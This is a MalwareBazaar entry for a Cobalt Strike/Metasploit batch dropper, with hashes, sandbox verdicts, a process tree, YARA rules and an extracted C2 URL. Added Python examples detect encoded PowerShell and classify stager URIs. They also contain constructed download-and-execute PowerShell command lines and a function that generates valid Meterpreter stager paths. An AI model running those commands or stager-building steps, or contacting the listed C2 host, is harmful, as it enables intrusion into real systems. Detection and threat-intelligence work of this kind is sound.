MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Cobalt Strike


Vendor detections: 16



SHA256 hash: b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee
SHA3-384 hash: ad8668fd482b771c9c1c46aec31517456c6638803a554e61b6fd3a3e7d02d688cc6415ddb25adb3232f5d0876402fd3e
SHA1 hash: 6dbb6fdb21c0a9d282ae5102702331039bdb6d38
MD5 hash: fd0ba3141672396b6e1145db7bb06af0
humanhash: angel-seven-avocado-cardinal
File name: Target.bat
Signature: Cobalt Strike
File size: 8'151 bytes
First seen: 2025-08-24 17:37:54 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/plain
ssdeep: 192:+n2jh1hqT2K+XKSPVngR/yqklImNXJJ4+zFaT7q6b2dHhW:+n2jh1hsUhVnSClhP6KdHhW
TLSH: T177F1007AC631BCD443AD328067651C5F22E44A57D3B74B64CB091CF63E65392EF1AA8C
Magika: powershell
Reporter: abuse_ch
Tags: bat, Cobalt Strike

Intelligence

File Origin
# of uploads: 1
# of downloads: 495
Origin country: SE

Vendor Threat Intelligence

Malware family: tinynuke
ID: 1
File name: main.exe
Verdict: Malicious activity
Analysis date: 2025-08-23 20:00:39 UTC
Tags: auto xworm rat python phishing github anti-evasion loader tinynuke xtinyloader meterpreter backdoor payload metasploit uac powershellempire framework vidar stealer telegram evasion generic rhadamanthys quasar agenttesla asyncrat pyinstaller irc lumma n-w0rm worm masslogger

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample.

Verdict: Malicious
Score: 99.9%
Tags: metasploit ransomware xtreme shell

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: cmd

Verdict: Malicious
File Type: unix shell
First seen: 2025-08-17T11:43:00Z UTC
Last seen: 2025-08-17T11:43:00Z UTC
Hits: ~10

Result
Threat name: Metasploit
Detection: malicious
Classification: troj.evad
Score: 100 / 100
Signature:
  Antivirus / Scanner detection for submitted sample
  C2 URLs / IPs found in malware configuration
  Encrypted powershell cmdline option found
  Found malware configuration
  Found suspicious powershell code related to unpacking or dynamic code loading
  Joe Sandbox ML detected suspicious sample
  Malicious sample detected (through community Yara rule)
  Multi AV Scanner detection for submitted file
  Obfuscated command line found
  Sigma detected: Base64 Encoded PowerShell Command Detected
  Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
  Sigma detected: Potential PowerShell Command Line Obfuscation
  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
  Suspicious powershell command line found
  Yara detected Metasploit Payload
  Yara detected MetasploitPayload
Behaviour
Behavior Graph (ID 1764030, sample Target.bat, start date 24/08/2025, architecture WINDOWS, score 100), as a process tree with each node's signatures and network contacts:
  Target.bat: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 10 other signatures
    cmd.exe: Suspicious powershell command line found; Encrypted powershell cmdline option found
      cmd.exe: Suspicious powershell command line found; Encrypted powershell cmdline option found
        powershell.exe: Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading
          powershell.exe: Found suspicious powershell code related to unpacking or dynamic code loading; connects to 83.244.163.203:7788 (EXPONENTIAL-E-ASGB, United Kingdom)
            conhost.exe
      conhost.exe
    svchost.exe: contacts 127.0.0.1 (unknown)
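The Sigma hits listed above (encoded command, base64 keywords, FromBase64String, reversed commands, command-line obfuscation) describe what to look for in the cmd.exe -> cmd.exe -> powershell.exe -> powershell.exe chain. As an added example, not MalwareBazaar's, Joe Sandbox's or the Sigma project's code, here is that detection logic in Python run over process-creation command lines. The command lines, keyword lists and heuristics are ours: the page does not show Target.bat's real commands, so none are reproduced, and 198.51.100.7 is a documentation address standing in for a C2.

```python
"""Sigma-style PowerShell command-line checks (added example, not page code).

The keyword lists and heuristics below are our own approximations of what the
named Sigma rules look for, not the rules themselves. EVENTS is constructed
for the demo and is not taken from the sample on this page.
"""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc...);
# the argument is base64 of the UTF-16LE script text.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|c|n)?\s+([A-Za-z0-9+/=]{16,})", re.I
)

# Keywords worth flagging once the command is readable (our list, not Sigma's).
SUSPICIOUS_KEYWORDS = [
    "FromBase64String", "Invoke-Expression", "IEX", "DownloadString",
    "Net.WebClient", "Invoke-WebRequest", "Start-Process",
]
# Reversed spellings catch scripts that store a cmdlet name backwards and
# reverse it at run time; three-letter aliases like IEX are too noisy reversed.
REVERSED_KEYWORDS = [k[::-1] for k in SUSPICIOUS_KEYWORDS if len(k) > 5]

# Cheap obfuscation tells: backticks inside a word, [array]::Reverse, -join ''.
OBFUSCATION = re.compile(r"\w`\w|\[array\]::reverse|-join\s*''", re.I)


def split_encoded(cmdline):
    """Cut the base64 blob out of the command line and decode it.

    Returns (visible command line with the blob replaced by <encoded>, decoded
    script or None). Bad base64 is treated as "not encoded" rather than raising.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline, None
    visible = cmdline[:m.start(1)] + "<encoded>" + cmdline[m.end(1):]
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return visible, None
    try:
        return visible, raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Not UTF-16LE: keep the bytes readable so the keyword checks still run.
        return visible, raw.decode("latin-1")


def analyse(cmdline):
    """Apply the checks to one process command line and name what fired."""
    visible, decoded = split_encoded(cmdline)
    text = visible + "\n" + (decoded or "")
    lower = text.lower()
    keywords = [k for k in SUSPICIOUS_KEYWORDS if k.lower() in lower]
    reversed_hits = [k for k in REVERSED_KEYWORDS if k.lower() in lower]
    findings = []
    if decoded is not None:
        findings.append("Base64 Encoded PowerShell Command Detected")
        if keywords:
            findings.append("Malicious Base64 Encoded PowerShell Keywords in Command Lines")
    if "frombase64string" in lower:
        findings.append("PowerShell Base64 Encoded FromBase64String Cmdlet")
    if reversed_hits:
        findings.append("Potential PowerShell Obfuscation Via Reversed Commands")
    if OBFUSCATION.search(text):
        findings.append("Potential PowerShell Command Line Obfuscation")
    return {"decoded": decoded, "keywords": keywords,
            "reversed": reversed_hits, "findings": findings}


def encode_ps(script):
    """Produce the blob -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines (illustrative, not the sample's).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:7788/x')"
EVENTS = [
    "cmd.exe /c powershell -nop -w hidden -e " + encode_ps(STAGER),
    "powershell.exe -enc " + encode_ps(
        "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($p)) | IEX"),
    "powershell.exe -c \"$s='noisserpxE-ekovnI'; & ($s[-1..-($s.Length)] -join '') 'whoami'\"",
    "powershell.exe -NoProfile -Command Get-Process",
]


def scan(events=EVENTS):
    """Analyse every event, as a detection pipeline would per process."""
    return [analyse(e) for e in events]


if __name__ == "__main__":
    for event, result in zip(EVENTS, scan()):
        print(event[:60], "->", result["findings"])
```

Two design points: the keyword check runs on the visible line and the decoded script together, because flags like -w hidden sit outside the blob while the cmdlets sit inside it, and a base64 blob that fails to decode is reported as not encoded rather than raising, so a malformed argument cannot make the event disappear from the pipeline.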
Threat name: Script-PowerShell.Backdoor.Meterpreter
Status: Malicious
First seen: 2025-08-17 05:58:49 UTC
File Type: Text (Batch)
AV detection: 15 of 24 (62.50%)
Threat level: 5/5

Verdict: malicious
Label(s): cobaltstrike metasploit

Result
Malware family: metasploit
Score: 10/10
Tags: family:metasploit backdoor defense_evasion discovery execution trojan
Behaviour:
  Suspicious behavior: EnumeratesProcesses
  Suspicious use of AdjustPrivilegeToken
  Suspicious use of WriteProcessMemory
  System Location Discovery: System Language Discovery
  Badlisted process makes network request
  Command and Scripting Interpreter: PowerShell
  Modifies trusted root certificate store through registry
  MetaSploit
  Metasploit family
Malware Config
C2 Extraction: http://83.244.163.203:7788/Lrl704cuqDDcT91Ouwu6vQIMO0OppTT5f-J_7eujoV1M60ne7Y_Z8ce_QGBE1llotu5Ww3Joa0knXvgWPdRyuMxlyG9h43g3JEUIIgwe8HZ-MPGpH1jmgkNldVZKP1ykI-JHC4hl0ICARvBqFkSDI
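The extracted C2 URL is the first thing to triage. Metasploit's reverse_http(s) handler does not match on a fixed path: it accepts any request whose URI bytes sum, modulo 256, to one of a few fixed values (Rex::Payloads::Meterpreter::UriChecksum), and Cobalt Strike's HTTP stager follows the same convention, which is why stager paths look like random base64url strings. As an added example, not MalwareBazaar's or Metasploit's code and not taken from the sample, the check below applies that checksum to the URL above and shows how such a path is generated. The path sums to 92, the value Metasploit's Windows stager (INITW) uses and Cobalt Strike's x86 stager shares, consistent with the Metasploit, Meterpreter and Cobalt Strike labels on this page. The stripping of non-base64url characters is our reading of the handler's process_uri_resource; 198.51.100.7 is a documentation address.

```python
"""Stager URI checksum8 triage check (added example, not page code)."""
import random
import string
from urllib.parse import urlsplit

# Values from Metasploit's UriChecksum module plus the two Cobalt Strike stager values.
URI_CHECKSUMS = {
    92: "INITW/INITN: Metasploit Windows or native stager (also Cobalt Strike x86 stager)",
    93: "Cobalt Strike x64 stager",
    88: "INITJ: Metasploit Java stager",
    80: "INITP: Metasploit Python stager",
    95: "INIT_CONN: stageless Meterpreter",
    98: "CONN: existing Meterpreter session",
}
B64URL = string.ascii_letters + string.digits + "-_"

# C2 URL as extracted from the sample's configuration on this page.
SAMPLE_C2 = "http://83.244.163.203:7788/Lrl704cuqDDcT91Ouwu6vQIMO0OppTT5f-J_7eujoV1M60ne7Y_Z8ce_QGBE1llotu5Ww3Joa0knXvgWPdRyuMxlyG9h43g3JEUIIgwe8HZ-MPGpH1jmgkNldVZKP1ykI-JHC4hl0ICARvBqFkSDI"


def checksum8(data):
    """Rex::Text.checksum8: byte values summed modulo 256."""
    return sum(data.encode("latin-1")) % 256


def classify_uri(url):
    """Reduce a URL to the bare URI the handler sums and look the sum up.

    The handler drops the leading slash and, as we read process_uri_resource,
    any character outside the base64url alphabet before summing.
    """
    path = urlsplit(url).path.lstrip("/")
    bare = "".join(c for c in path if c in B64URL)
    value = checksum8(bare)
    return value, URI_CHECKSUMS.get(value, "no known stager checksum")


def make_stager_uri(target, length, rng=None):
    """Build a random base64url URI whose checksum8 equals target.

    Same idea as Metasploit's generate_uri_checksum, which keeps drawing random
    base64url strings until one sums correctly; here the last character is
    solved for directly and only the rare unsolvable draw is retried.
    """
    rng = rng or random.Random()
    while True:
        prefix = "".join(rng.choice(B64URL) for _ in range(length - 1))
        need = (target - checksum8(prefix)) % 256
        fix = [c for c in B64URL if ord(c) == need]
        if fix:
            return prefix + fix[0]


if __name__ == "__main__":
    value, meaning = classify_uri(SAMPLE_C2)
    print(f"checksum8 = {value}: {meaning}")
    uri = make_stager_uri(95, 30, random.Random(7))
    print(uri, classify_uri("http://198.51.100.7/" + uri))
```

The checksum is a triage aid, not proof: one byte value in 256 collides with each known mode, so a benign path can land on 92 by chance, and a long base64url path with a matching sum is the signal, not the sum alone. It is also a practical network detection: a request whose first path component sums to one of these values, on an otherwise unremarkable host such as 83.244.163.203:7788, is worth an alert.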
Malware family: CobaltStrike
Verdict: Malicious
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Msfpayloads_msf_cmd
Author: Florian Roth (Nextron Systems)
Description: Metasploit Payloads - file msf-cmd.ps1
Reference: Internal Research

Rule name: Msfpayloads_msf_cmd_RID2ECC
Author: Florian Roth
Description: Metasploit Payloads - file msf-cmd.ps1
Reference: Internal Research

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Cobalt Strike
File type: Batch (bat)
SHA256: b7c30801d6febaea892b7c62e725338fba7cb2a7d2ade94a451445b9351a4cee (this sample)
